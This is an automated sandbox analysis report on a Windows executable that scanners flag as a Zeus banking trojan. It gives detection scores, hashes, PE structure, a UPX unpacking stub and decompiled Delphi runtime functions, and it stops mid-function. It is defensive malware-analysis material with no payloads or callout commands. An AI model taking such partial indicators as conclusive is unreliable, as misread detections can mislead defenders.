Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
E7CThb0bFa.exe	85%	Virustotal		Browse
E7CThb0bFa.exe	93%	ReversingLabs	Win32.Trojan.Zeus
E7CThb0bFa.exe	100%	Avira	TR/Crypt.ZPACK.Gen
E7CThb0bFa.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.E7CThb0bFa.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.E7CThb0bFa.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.E7CThb0bFa.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK	Download File
0.2.E7CThb0bFa.exe.24e0000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.1.E7CThb0bFa.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK	Download File
0.0.E7CThb0bFa.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	381780
Start date:	05.04.2021
Start time:	02:53:56
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	E7CThb0bFa (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.evad.winEXE@3/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 83.4% (good quality ratio 78.9%) Quality average: 82.1% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 52% Number of executed functions: 25 Number of non-executed functions: 230
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.927240072544305
TrID:	Win32 Executable (generic) a (10002005/4) 99.37% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	E7CThb0bFa.exe
File size:	275968
MD5:	ba28a06e2aae1052319541d4124122c5
SHA1:	20613e49ee5b14dc04c7b045900f1d0e1b4173be
SHA256:	9738c7021fdded8bb03e1588d17386dc175328630ecb0f1a3d671dfc4fb18d46
SHA512:	9aaaa26c106043d56c48f89b3dd7b84ba9bbf7951c5e82a622d0eb93169e9520643bd5cb6b49dbd1cce7f5cd776e6b62b855266c099304acd3b9faa703187f25
SSDEEP:	3072:q4ep6/R4I4NdnFubGtt89Z0pVaCv86giQvBjR4DtHuLUGbcQTaQQ0tQPUy8xVFQR:qmGfubsi0pVaDL4B0bcQTXJxVsGhxMI0
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x48d160
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	92644df84cdbba7637462c128671f148

Entrypoint Preview

Instruction
pushad
mov esi, 0044B000h
lea edi, dword ptr [esi-0004A000h]
mov dword ptr [edi+0007809Ch], 9DB73737h
push edi
or ebp, FFFFFFFFh
jmp 00007F094CCB2920h
nop
nop
nop
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB28FFh
mov eax, 00000001h
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F094CCB291Dh
jne 00007F094CCB293Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB2931h
dec eax
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F094CCB28E6h
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F094CCB2964h
xor ecx, ecx
sub eax, 03h
jc 00007F094CCB2923h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F094CCB2987h
sar eax, 1
mov ebp, eax
jmp 00007F094CCB291Dh
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB28DEh
inc ecx
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB28D0h
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F094CCB2901h
jne 00007F094CCB291Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F094CCB28F6h
add ecx, 02h
cmp ebp, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8e9c8	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x9c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8d318	0x18	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x4a000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x4b000	0x43000	0x42400	False	0.982060731132	data	7.9419130638	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8e000	0x1000	0xc00	False	0.3330078125	data	3.33000850621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_CURSOR	0x869c8	0x134	data
RT_CURSOR	0x86afc	0x134	data
RT_CURSOR	0x86c30	0x134	data
RT_CURSOR	0x86d64	0x134	data
RT_CURSOR	0x86e98	0x134	data
RT_CURSOR	0x86fcc	0x134	data
RT_CURSOR	0x87100	0x134	data
RT_BITMAP	0x87234	0x1d0	data
RT_BITMAP	0x87404	0x1e4	data
RT_BITMAP	0x875e8	0x1d0	data
RT_BITMAP	0x877b8	0x1d0	data
RT_BITMAP	0x87988	0x1d0	data
RT_BITMAP	0x87b58	0x1d0	data
RT_BITMAP	0x87d28	0x1d0	data
RT_BITMAP	0x87ef8	0x1d0	data
RT_BITMAP	0x880c8	0x1d0	data
RT_BITMAP	0x88298	0x1d0	data
RT_BITMAP	0x88468	0xe8	data
RT_DIALOG	0x88550	0x52	data
RT_STRING	0x885a4	0xfc	data
RT_STRING	0x886a0	0x1ec	data
RT_STRING	0x8888c	0x148	data
RT_STRING	0x889d4	0x274	data
RT_STRING	0x88c48	0x150	data
RT_STRING	0x88d98	0xec	data
RT_STRING	0x88e84	0x1b0	data
RT_STRING	0x89034	0x450	data
RT_STRING	0x89484	0x364	data
RT_STRING	0x897e8	0x440	data
RT_STRING	0x89c28	0x1b0	data
RT_STRING	0x89dd8	0xec	data
RT_STRING	0x89ec4	0x1e4	data
RT_STRING	0x8a0a8	0x3f4	data
RT_STRING	0x8a49c	0x340	data
RT_STRING	0x8a7dc	0x2c8	data
RT_RCDATA	0x8aaa4	0x10	Non-ISO extended-ASCII text, with no line terminators
RT_RCDATA	0x8aab4	0x25c	data
RT_GROUP_CURSOR	0x8ad10	0x14	data
RT_GROUP_CURSOR	0x8ad24	0x14	Non-ISO extended-ASCII text, with no line terminators
RT_GROUP_CURSOR	0x8ad38	0x14	data
RT_GROUP_CURSOR	0x8ad4c	0x14	data
RT_GROUP_CURSOR	0x8ad60	0x14	data
RT_GROUP_CURSOR	0x8ad74	0x14	data
RT_GROUP_CURSOR	0x8ad88	0x14	data

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
advapi32.dll	RegCloseKey
comctl32.dll	ImageList_Add
gdi32.dll	SaveDC
oleaut32.dll	VariantCopy
user32.dll	GetDC
version.dll	VerQueryValueA

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: E7CThb0bFa.exe PID: 6988 Parent PID: 5952

General

Start time:	02:54:36
Start date:	05/04/2021
Path:	C:\Users\user\Desktop\E7CThb0bFa.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\E7CThb0bFa.exe'
Imagebase:	0x400000
File size:	275968 bytes
MD5 hash:	BA28A06E2AAE1052319541D4124122C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: E7CThb0bFa.exe PID: 7048 Parent PID: 6988

General

Start time:	02:54:38
Start date:	05/04/2021
Path:	C:\Users\user\Desktop\E7CThb0bFa.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\E7CThb0bFa.exe
Imagebase:	0x400000
File size:	275968 bytes
MD5 hash:	BA28A06E2AAE1052319541D4124122C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: E7CThb0bFa.exe PID: 6988 Parent PID: 5952 E7CThb0bFa.exeCOMMON

Executed Functions

Function 004054DC, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004054DC(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char* _v32;
				char _v293;
				long _t58;
				long _t75;
				long _t77;
				CHAR* _t84;
				CHAR* _t87;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t101;
				struct HINSTANCE__* _t110;
				intOrPtr _t115;
				void* _t124;
				void* _t126;
				intOrPtr _t127;

				_t124 = _t126;
				_t127 = _t126 + 0xfffffedc;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v293, 0x105);
				_v22 = 0;
				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t58 == 0) {
					L3:
					_push(_t124);
					_push(0x4055e0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t127;
					_v28 = 5;
					E00405304( &_v293, 0x105);
					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, 0x40575c, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(0x4055e7);
					return RegCloseKey(_v12);
				} else {
					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t75 == 0) {
						goto L3;
					} else {
						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t77 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v293);
							L00401294();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t110 = 0;
							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t84 =  &_v293;
								_push(_t84);
								L0040129C();
								_v32 = _t84 +  &_v293;
								while( *_v32 != 0x2e &&  &_v293 != _v32) {
									_v32 = _v32 - 1;
								}
								_t87 =  &_v293;
								if(_t87 != _v32) {
									_v32 = _v32 + 1;
									if(_v22 != 0) {
										_push(0x105 - _v32 - _t87);
										_push( &_v22);
										_push(_v32);
										L00401294();
										_t110 = LoadLibraryExA( &_v293, 0, 2);
									}
									if(_t110 == 0 && _v17 != 0) {
										_push(0x105 - _v32 -  &_v293);
										_push( &_v17);
										_push(_v32);
										L00401294();
										_t94 = LoadLibraryExA( &_v293, 0, 2); // executed
										_t110 = _t94;
										if(_t110 == 0) {
											_v15 = 0;
											_push(0x105 - _v32 -  &_v293);
											_push( &_v17);
											_push(_v32);
											L00401294();
											_t101 = LoadLibraryExA( &_v293, 0, 2); // executed
											_t110 = _t101;
										}
									}
								}
							}
							return _t110;
						} else {
							goto L3;
						}
					}
				}
			}

0x004054dd
0x004054df
0x004054e6
0x004054f7
0x004054fc
0x00405515
0x0040551c
0x0040555e
0x00405560
0x00405561
0x00405566
0x00405569
0x0040556c
0x0040557e
0x004055a1
0x004055c1
0x004055c1
0x004055c5
0x004055cb
0x004055ce
0x004055d1
0x004055df
0x0040551e
0x00405533
0x0040553a
0x00000000
0x0040553c
0x00405551
0x00405558
0x004055e7
0x004055ef
0x004055f6
0x004055f7
0x0040560a
0x0040560f
0x00405618
0x0040562e
0x00405634
0x00405635
0x00405642
0x0040564a
0x00405647
0x00405647
0x0040565d
0x00405666
0x0040566c
0x00405673
0x00405681
0x00405685
0x00405689
0x0040568a
0x0040569f
0x0040569f
0x004056a3
0x004056bd
0x004056c1
0x004056c5
0x004056c6
0x004056d6
0x004056db
0x004056df
0x004056e1
0x004056f7
0x004056fb
0x004056ff
0x00405700
0x00405710
0x00405715
0x00405715
0x004056df
0x004056a3
0x00405666
0x0040571d
0x00000000
0x00000000
0x00000000
0x00405558
0x0040553a

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004054F7
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405515
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405533
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405551
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040559A
RegQueryValueExA.ADVAPI32(?,0040575C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001), ref: 004055B8
RegCloseKey.ADVAPI32(?,004055E7,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004055DA
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004055F7
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405604
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040560A
lstrlen.KERNEL32(00000000), ref: 00405635
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0040568A
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0040569A
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 004056C6
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 004056D6
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00405700
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00405710

Strings

Software\Borland\Delphi\Locales, xrefs: 00405547
Software\Borland\Locales, xrefs: 0040550B, 00405529

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 58af89e23c09c199b9831143532fdfcc0d720da703cbc6bdc81dc4164112f48a
Instruction ID: 78d56fb10151a52d9f41951c3ae2861171ac22a5739348b763bff528435d593e
Opcode Fuzzy Hash: 58af89e23c09c199b9831143532fdfcc0d720da703cbc6bdc81dc4164112f48a
Instruction Fuzzy Hash: 83614371A006497EEB15EAE8CC86FEF77BCDB48304F4040B6A604F61C1D6BC9A448F58

Uniqueness

Uniqueness Score: -1.00%

Function 0044A5F4, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 399
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044A5F4(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t305;
				signed int _t307;
				struct HWND__* _t312;
				struct HWND__* _t313;
				struct HWND__* _t314;
				void* _t315;
				intOrPtr _t336;
				struct HWND__* _t340;
				intOrPtr _t362;
				void* _t364;
				void* _t368;
				void* _t369;
				intOrPtr _t370;

				_t315 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t369);
				_push(0x44acab);
				_push( *[fs:edx]);
				 *[fs:edx] = _t370;
				 *(_v12 + 0xc) = 0;
				_t305 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t305 < 0) {
					L5:
					E0044A4A8(_v8, _t315, _v12);
					_t307 =  *_v12;
					_t161 = _t307;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_pop(_t336);
									 *[fs:eax] = _t336;
									return 0;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0044C59C(_v8,  *(_v12 + 8), _t307) & 0x0000007f;
								} else {
									L101:
									E0044A56C(_t369); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0044B22C(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0044B1D0(_v8, _t315,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t340 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t340 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t340 + 0x30))) {
										_t191 = E004423CC(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0044B59C(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t365 = _t197;
								_t199 = E0043260C(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043260C(_t365));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043260C(_t365));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x479ba8 = 0;
											_t206 = GetFocus();
											SetFocus(E0043260C(_t365));
											E0042D0C4(_t365,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x479ba8 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0044B0A8(_v8, _t315, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0044AD10(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0044ADC0(_v8);
								} else {
									E0044A56C(_t369);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t307 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E00425998(E004258B8());
							__eflags = _t247;
							if(_t247 != 0) {
								E004259F4(E004258B8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0044ACF4(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t312 = E0040D0AC("vcltest3.dll", _t307, 0x8000);
											 *(_v8 + 0xa0) = _t312;
											__eflags = _t312;
											if(_t312 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t313 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_v16 = _t313;
												__eflags = _t313;
												if(_t313 != 0) {
													_t269 =  *(_v12 + 8);
													_v16( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x47bba0; // 0x2321310
							E00449A98(_t272);
							E0044A56C(_t369);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x47a0c8; // 0x47bafc
							E00436CA0( *_t276, _t315,  *(_v12 + 4));
							E0044A500(_v8, _t307, _t315, _v12, _t364);
							E0044A56C(_t369);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E0044A56C(_t369);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0044A3FC();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0044A40C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
